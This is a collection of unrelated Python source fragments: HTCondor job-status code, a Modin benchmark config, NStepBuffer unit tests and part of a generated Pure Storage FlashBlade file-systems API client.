dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No {resource_type} job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
job_status = "PROVISIONING REQUEST PENDING"
elif "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if job_started_time is None:
job_started_time = datetime.fromtimestamp(event.timestamp)
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.JOB_TERMINATED:
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
elif event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Calculate how long job has been in its current state
current_time = datetime.now()
time_diff = None
if job_status == "PROVISIONING REQUEST PENDING":
time_diff = current_time - provisioner_job_submitted_time
elif job_status == "RUNNING":
time_diff = current_time - job_started_time
            # Now that we have all the information we want, display it
            if job_status == "COMPLETE":
                print("Job has completed")
else:
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is waiting for {resource_type.upper()} to provision pending request", end='')
else:
print(f"Job is {job_status}", end='')
if time_diff is not None:
print(f" since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
print("")
else:
print(f"Error: The 'job status' command does not support {resource_type} resources.")
sys.exit(1)
@staticmethod
def resources(id, options=None):
"""
Displays the resources used by a specified job
"""
# If no resource specified, assume job is running on local pool
if "resource" not in options:
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["RemoteHost"]
)
except IndexError:
print(f"No jobs found for ID {id}.")
sys.exit(0)
            except Exception:
                print("Unable to look up job resources")
sys.exit(1)
if len(job) == 0:
print(f"No jobs found for ID {id}.")
sys.exit(0)
            # TODO: Make this work correctly for jobs that haven't started running yet
job_host = job[0]["RemoteHost"]
print(f"Job is using resource {job_host}")
# Jobs running on provisioned Slurm resources need to retrieve
# additional information from the provisioning DAGMan log
elif options["resource"] == "slurm":
# Internal variables
dagman_cluster_id = None
provisioner_cluster_id = None
slurm_cluster_id = None
# User-facing variables (all values set below are default/initial state)
provisioner_job_submitted_time = None
provisioner_job_scheduled_end_time = None
job_status = "NOT SUBMITTED"
job_started_time = None
jobs_running = 0
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No Slurm job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
job_status = "PROVISIONING REQUEST PENDING"
if event.cluster == provisioner_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
provisioner_job_started_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
job_started_time = datetime.fromtimestamp(event.timestamp)
if event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if event.cluster == slurm_cluster_id and (event.type == htcondor.JobEventType.JOB_TERMINATED or event.type == htcondor.JobEventType.JOB_EVICTED):
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
if event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Now that we have all the information we want, display it
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is still waiting for {slurm_nodes_requested} Slurm nodes to provision")
elif job_status == "RUNNING":
print(f"Job is running on {jobs_running}/{slurm_nodes_requested} requested Slurm nodes")
elif job_status == "ERROR":
print(f"An error occurred provisioning Slurm resources")
# Show information about time remaining
if job_status == "RUNNING" or job_status == "COMPLETE":
current_time = datetime.now()
if current_time < provisioner_job_scheduled_end_time:
time_diff = provisioner_job_scheduled_end_time - current_time
print(f"Slurm resources are reserved for another {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
time_diff = current_time - provisioner_job_scheduled_end_time
print(f"Slurm resources were terminated since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""Compatibility layer for parameters used by ASV."""
import os
import modin.pandas as pd
try:
from modin.config import NPartitions
NPARTITIONS = NPartitions.get()
except ImportError:
NPARTITIONS = pd.DEFAULT_NPARTITIONS
try:
from modin.config import TestDatasetSize, AsvImplementation, Engine, Backend
ASV_USE_IMPL = AsvImplementation.get()
ASV_DATASET_SIZE = TestDatasetSize.get() or "Small"
ASV_USE_ENGINE = Engine.get()
ASV_USE_BACKEND = Backend.get()
except ImportError:
    # The same benchmarking code can be run against different versions of Modin,
    # so if these config imports fail we fall back to environment variables and defaults.
ASV_USE_IMPL = os.environ.get("MODIN_ASV_USE_IMPL", "modin")
ASV_DATASET_SIZE = os.environ.get("MODIN_TEST_DATASET_SIZE", "Small")
ASV_USE_ENGINE = os.environ.get("MODIN_ENGINE", "Ray")
ASV_USE_BACKEND = os.environ.get("MODIN_BACKEND", "Pandas")
ASV_USE_IMPL = ASV_USE_IMPL.lower()
ASV_DATASET_SIZE = ASV_DATASET_SIZE.lower()
ASV_USE_ENGINE = ASV_USE_ENGINE.lower()
ASV_USE_BACKEND = ASV_USE_BACKEND.lower()
assert ASV_USE_IMPL in ("modin", "pandas")
assert ASV_DATASET_SIZE in ("big", "small")
assert ASV_USE_ENGINE in ("ray", "dask", "python", "native")
assert ASV_USE_BACKEND in ("pandas", "omnisci", "pyarrow")
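
# Sketch of how a benchmark module might consume these values (illustrative
# only; the shape table below is a placeholder, not part of this module):
#
#   DATA_SHAPES = {"small": (250, 250), "big": (5000, 5000)}
#   rows, cols = DATA_SHAPES[ASV_DATASET_SIZE]
#   if ASV_USE_IMPL == "modin":
#       df = pd.DataFrame({"col": range(rows)})
#   else:
#       import pandas
#       df = pandas.DataFrame({"col": range(rows)})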
|
from . import models
from . import controllers
from . import reports
|
import numpy as np
import pytest
from ai_traineree.buffers import Experience, NStepBuffer
def generate_sample_SARS(iterations, obs_space: int = 4, action_size: int = 2, dict_type=False):
state_fn = lambda: np.random.random(obs_space)
action_fn = lambda: np.random.random(action_size)
reward_fn = lambda: float(np.random.random() - 0.5)
done_fn = lambda: np.random.random() > 0.5
state = state_fn()
for _ in range(iterations):
next_state = state_fn()
if dict_type:
yield dict(
state=list(state), action=list(action_fn()), reward=[reward_fn()], next_state=list(next_state), done=[bool(done_fn())]
)
else:
yield (list(state), list(action_fn()), reward_fn(), list(next_state), bool(done_fn()))
state = next_state
def populate_buffer(buffer, num_samples):
for (state, action, reward, next_state, done) in generate_sample_SARS(num_samples):
buffer.add(state=state, action=action, reward=reward, next_state=next_state, done=done)
return buffer
def test_nstep_buffer_add_sample():
# Assign
buffer = NStepBuffer(2, gamma=1.)
# Act
sars = next(generate_sample_SARS(1, dict_type=True))
buffer.add(**sars)
# Assert
assert len(buffer) == 1
assert list(buffer.data) == [Experience(**sars)]
def test_nstep_buffer_add_many_samples():
# Assign
buffer_size = 4
gamma = 1.
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
last_rewards = [s['reward'][0] for s in last_samples]
# Act
for sample in last_samples:
sample['done'] = [False] # Make sure all samples are counted
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for expected_len in range(buffer_size)[::-1]:
sample = buffer.get()
assert len(buffer) == expected_len
assert sample.reward[0] == sum(last_rewards[-expected_len-1:])
def test_nstep_buffer_add_many_samples_discounted():
# Assign
buffer_size = 4
gamma = 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
    last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
last_rewards = [s['reward'][0] for s in last_samples]
# Act
for sample in last_samples:
sample['done'] = [False] # Make sure all samples are counted
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for expected_len in range(buffer_size)[::-1]:
sample = buffer.get()
discounted_reward = sum([r * gamma**idx for (idx, r) in enumerate(last_rewards[-expected_len-1:])])
assert len(buffer) == expected_len
assert sample.reward[0] == discounted_reward, f"{sample}"
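
# The discounted value asserted above is the n-step return
#   R_t = sum_{k=0}^{n-1} gamma**k * r_{t+k},
# truncated early when a `done` flag ends the episode (see the next test).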
def test_nstep_buffer_add_many_samples_discounted_terminate():
# Assign
buffer_size = 4
gamma = 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
populate_buffer(buffer, 20) # in-place
    last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
expected_rewards = []
for idx, sample in enumerate(last_samples):
expected_rewards.append(sample['reward'][0])
for iidx, sample in enumerate(last_samples[idx+1:]):
if any(sample['done']):
break
expected_rewards[-1] += gamma ** (iidx+1) * sample['reward'][0]
# Act
for sample in last_samples:
buffer.add(**sample)
# Assert
assert len(buffer) == buffer_size
for idx, expected_len in enumerate(range(buffer_size)[::-1]):
sample = buffer.get()
assert len(buffer) == expected_len
assert sample.reward[0] == expected_rewards[idx], f"{sample}"
def test_nstep_buffer_clear():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
populate_buffer(buffer, 10) # in-place
# Act & assert
assert len(buffer) == 5
buffer.clear()
assert len(buffer) == 0
def test_nstep_buffer_get_state_without_data():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
# Act
state = buffer.get_state()
# Assert
assert state.type == NStepBuffer.type
assert state.buffer_size == 5
assert state.batch_size == 1
assert state.data is None
def test_nstep_buffer_get_state_with_data():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
populate_buffer(buffer, 10) # in-place
# Act
state = buffer.get_state()
# Assert
assert state.type == NStepBuffer.type
assert state.buffer_size == 5
assert state.batch_size == 1
assert len(state.data) == state.buffer_size
def test_nstep_buffer_from_state_without_data():
# Assign
buffer_size, gamma = 5, 0.9
buffer = NStepBuffer(n_steps=buffer_size, gamma=gamma)
state = buffer.get_state()
# Act
new_buffer = NStepBuffer.from_state(state)
# Assert
assert new_buffer.type == NStepBuffer.type
assert new_buffer.gamma == gamma
assert new_buffer.buffer_size == state.buffer_size == buffer.n_steps
assert new_buffer.batch_size == state.batch_size == buffer.batch_size == 1
assert len(new_buffer.data) == 0
def test_nstep_buffer_from_state_with_data():
# Assign
buffer_size = 5
buffer = NStepBuffer(n_steps=buffer_size, gamma=1.)
buffer = populate_buffer(buffer, 10) # in-place
last_samples = [sars for sars in generate_sample_SARS(buffer_size, dict_type=True)]
for sample in last_samples:
buffer.add(**sample)
state = buffer.get_state()
# Act
new_buffer = NStepBuffer.from_state(state)
# Assert
assert new_buffer.type == NStepBuffer.type
assert new_buffer.buffer_size == state.buffer_size == buffer.n_steps
assert new_buffer.batch_size == state.batch_size == buffer.batch_size == 1
assert len(new_buffer.data) == state.buffer_size
for sample in last_samples:
assert Experience(**sample) in new_buffer.data
def test_per_from_state_wrong_type():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
state = buffer.get_state()
state.type = "WrongType"
# Act
with pytest.raises(ValueError):
NStepBuffer.from_state(state=state)
def test_per_from_state_wrong_batch_size():
# Assign
buffer = NStepBuffer(n_steps=5, gamma=1.)
state = buffer.get_state()
state.batch_size = 5
# Act
with pytest.raises(ValueError):
NStepBuffer.from_state(state=state)
|
# coding: utf-8
"""
Pure Storage FlashBlade REST 1.10 Python SDK
    Pure Storage FlashBlade REST 1.10 Python SDK. Compatible with REST API versions 1.0 - 1.10. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentation can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.10
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class FileSystemsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_file_systems(self, file_system, **kwargs):
"""
Create a new file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_file_systems(file_system, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem file_system: The attribute map used to create the file system. (required)
        :param bool overwrite: If set to true, overwrite an existing file system.
        :param bool discard_non_snapshotted_data: If set to true, discard non-snapshotted data.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_file_systems_with_http_info(file_system, **kwargs)
else:
(data) = self.create_file_systems_with_http_info(file_system, **kwargs)
return data
def create_file_systems_with_http_info(self, file_system, **kwargs):
"""
Create a new file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_file_systems_with_http_info(file_system, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FileSystem file_system: The attribute map used to create the file system. (required)
        :param bool overwrite: If set to true, overwrite an existing file system.
        :param bool discard_non_snapshotted_data: If set to true, discard non-snapshotted data.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system', 'overwrite', 'discard_non_snapshotted_data']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_file_systems" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_system' is set
if ('file_system' not in params) or (params['file_system'] is None):
raise ValueError("Missing the required parameter `file_system` when calling `create_file_systems`")
collection_formats = {}
path_params = {}
query_params = []
if 'overwrite' in params:
query_params.append(('overwrite', params['overwrite']))
if 'discard_non_snapshotted_data' in params:
query_params.append(('discard_non_snapshotted_data', params['discard_non_snapshotted_data']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'file_system' in params:
body_params = params['file_system']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
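    # Hypothetical usage sketch (host, token and file system attributes are
    # placeholders; the PurityFb client and FileSystem model are assumed to be
    # importable from the top-level purity_fb package):
    #
    #   from purity_fb import PurityFb, FileSystem
    #   fb = PurityFb("flashblade.example.com")
    #   fb.login(api_token="T-xxxxxxxx")
    #   res = fb.file_systems.create_file_systems(
    #       FileSystem(name="myfs", provisioned=1024**4))
    #   print(res.items[0].name)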
def create_filesystem_policies(self, **kwargs):
"""
Create a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.create_filesystem_policies_with_http_info(**kwargs)
return data
def create_filesystem_policies_with_http_info(self, **kwargs):
"""
Create a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PolicyMemberResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_file_systems(self, **kwargs):
"""
Delete a file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_file_systems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_file_systems_with_http_info(**kwargs)
else:
(data) = self.delete_file_systems_with_http_info(**kwargs)
return data
def delete_file_systems_with_http_info(self, **kwargs):
"""
Delete a file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_file_systems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param str name: The name of the file system or snapshot to be updated.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_file_systems" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'name' in params:
query_params.append(('name', params['name']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_filesystem_policies(self, **kwargs):
"""
Delete a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.delete_filesystem_policies_with_http_info(**kwargs)
return data
def delete_filesystem_policies_with_http_info(self, **kwargs):
"""
Delete a connection between a file system and a policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_file_systems(self, **kwargs):
"""
List file systems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
        :param int limit: The maximum number of resources to return; must be >= 0.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_file_systems_with_http_info(**kwargs)
else:
(data) = self.list_file_systems_with_http_info(**kwargs)
return data
def list_file_systems_with_http_info(self, **kwargs):
"""
List file systems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
        :param int limit: The maximum number of resources to return; must be >= 0.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids', 'names', 'filter', 'sort', 'start', 'limit', 'token', 'total_only']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_file_systems" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'total_only' in params:
query_params.append(('total_only', params['total_only']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_file_systems_performance(self, **kwargs):
"""
List instant or historical file system performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param int resolution: The sample frequency in milliseconds.
        :param str protocol: Sample performance of the specified protocol only.
:param int end_time: Time to end sample in milliseconds since epoch.
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param int limit: The maximum number of resources to return; must be >= 0.
